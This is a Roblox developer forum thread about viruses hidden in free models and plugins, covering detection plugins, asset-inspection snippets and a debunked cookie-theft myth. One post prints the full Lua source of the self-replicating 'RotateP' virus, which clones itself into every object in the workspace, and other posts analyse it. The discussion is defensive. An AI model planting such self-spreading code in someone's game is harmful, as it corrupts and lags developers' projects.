What are Free Model Viruses? What can they do?

I love how Ro-Defender is a free plugin that protects you from free plugins XD

3 Likes

Thank you for this plugin, i should inform my friend about this because he puts free models and i found out it has a virus and my roblox studio got infected

Hi, didn’t make these plugins. Only sharing them and providing information about them, let me know if your friend got rid of the virus.

All of your games were infected definitely means you either put the same model which has a virus in the game or it’s because of a plugin. Uninstall or delete all plugins you don’t know of, and use these plugins. It’s a simple process and it can be really helpful. Good luck!

2 Likes

It’s better to use:

local Tbl = {}
for _, v in ipairs(game:GetObjects("rbxassetid://IDHERE")) do
table.insert(Tbl, v)
v.Parent = workspace
end
game:GetService("Selection"):Set(Tbl)

as it inserts all the assets and not only the first one.

If a plugin has more than one asset, then it’s generally safe to say it’s malicious. No plugin would have more than one asset parented to the plugin itself, it’s usually just a folder.

It’s possible for multiple instances to be contained in a plugin. Sometimes this is also the case.

Also many freemodels have multiple assets included.

Besides the correct behavior for inserting assets is to loop trough the get objects and insert them all.

I… know.

This isn’t talk about free models, rather plugins.

Saves more time to write one line than 6.

for _,v in ipairs(game:GetObjects("rbxassetid://IDHERE")do v.Parent=workspace end

Not much longer

It still applies to plugins, plugins are basically a freemodel which is inserted to the plugin directory and the scripts run.

Is it still possible for them to take your login cookie?

It was never possible though? And no, it is not.

That’s what I thought. I was just confused because there were so many myths about that.

U can see virusses just by seeing a Fire script or some weird script with some random characters like the questionmark (?) Or something else, just a random name.

Does anyone knows what these “RotateP” Viruses do? I’m asking because I’ve seen these a lot…

1 Like

They go pretty far back in time. Apparently, it’s a fire / spread virus:

I’m having a problem when trying to join my one place - Development Discussion - DevForum | Roblox

Though it must’ve upgraded along the years.

(Do note this is based off of research and I’ve never seen that virus, if possible, include its source code).

1 Like

Beware that some antiviruses can have viruses in them.

1 Like

Here is the code…

if script.Parent.className ~= "RotateP" then
	local p = Instance.new("RotateP")
	p.Parent = workspace
	p.Name = "INfecTION"
	script.Parent = p
end

function check()
	local list = workspace:GetChildren()
	for i = 1, #list do
		if list[i]:findFirstChild("INfecTION") == nil and list[i].className ~= "RotateP" then
			script.Parent:Clone().Parent = list[i]
		end
		wait()
	end
end

while true do
	check()
	if workspace:findFirstChild("inFECtion") == nil then
		local main = script.Parent:Clone()
		main.Name = "inFECtion"
		main.Parent = workspace
	end
	wait(3)
end

It’s quite literally a virus. It injects itself into every child of workspace. It clones its parent rather than itself; is there any other script which comes bundled with this?

Just the stanard vaccine script… and some weld spamming script

Here’s my virus scripts masterpost, for more resources! It covers some very common viruses to look out for.

RotateP and other Hidden Class viruses are often times lag generators OR are containers and/or gateways for other viruses, such as 4D Being, which is a container/gateway for Wildfire.
My masterpost covers a few of these. They’ve become more common in recent months.